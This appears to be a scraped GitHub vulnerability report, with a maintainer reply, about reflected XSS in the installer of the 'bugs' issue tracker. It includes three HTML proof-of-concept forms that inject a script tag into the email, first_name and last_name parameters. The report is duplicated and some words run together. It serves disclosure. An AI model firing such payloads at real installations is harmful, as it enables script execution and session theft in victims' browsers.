Describe the bug
Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.
To Reproduce
Steps to reproduce the behavior:
Go to the installation page
Complete the configuration including DB connection
Access each page of these HTML files.
Exploit 1 - exploit email parameter
<html><formmethod="POST" action="http://[localhost]/bugs/install/index.php"><inputname="email" value='test"/><script>alert(1)</script>'><button>Send my greetings</button></form></html>
Exploit 2 - exploit first_name parameter
<html><formmethod="POST" action="http://[localhost]/bugs/install/index.php"><inputname='first_name' value='test"/><script>alert(1)</script>'><inputname='email' value='hi'><button>Send my greetings</button></form></html>
Exploit 3 - exploit last_name parameter
<html><formmethod="POST" action="http://[localhost]/bugs/install/index.php"><inputname='last_name' value='test"/><script>alert(1)</script>'><inputname='email' value='hi'><button>Send my greetings</button></form></html>
Boom!
Screenshots
Attack result
Where the Issue Occurred
The code below displays the user-controlled parameter first_name, last_name, and email without sufficient sanitization:
Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities.
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.
BUGS users are mostly local users, as you prompt in your example: http://localhost/... they manage their own security.
Anyway, I'll reinforce security processes according to your advice.
Describe the bug
Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.
To Reproduce
Steps to reproduce the behavior:
Exploit 1 - exploit
emailparameterExploit 2 - exploit
first_nameparameterExploit 3 - exploit
last_nameparameterScreenshots
Where the Issue Occurred
The code below displays the user-controlled parameter
first_name,last_name, andemailwithout sufficient sanitization:bugs/install/index.php
Line 94 in f38ddb4
bugs/install/index.php
Line 101 in f38ddb4
bugs/install/index.php
Line 120 in f38ddb4
Note
Note that these multiple XSS vulnerabilities exist in the tinyissue as well as in the bugs repository here.
The text was updated successfully, but these errors were encountered: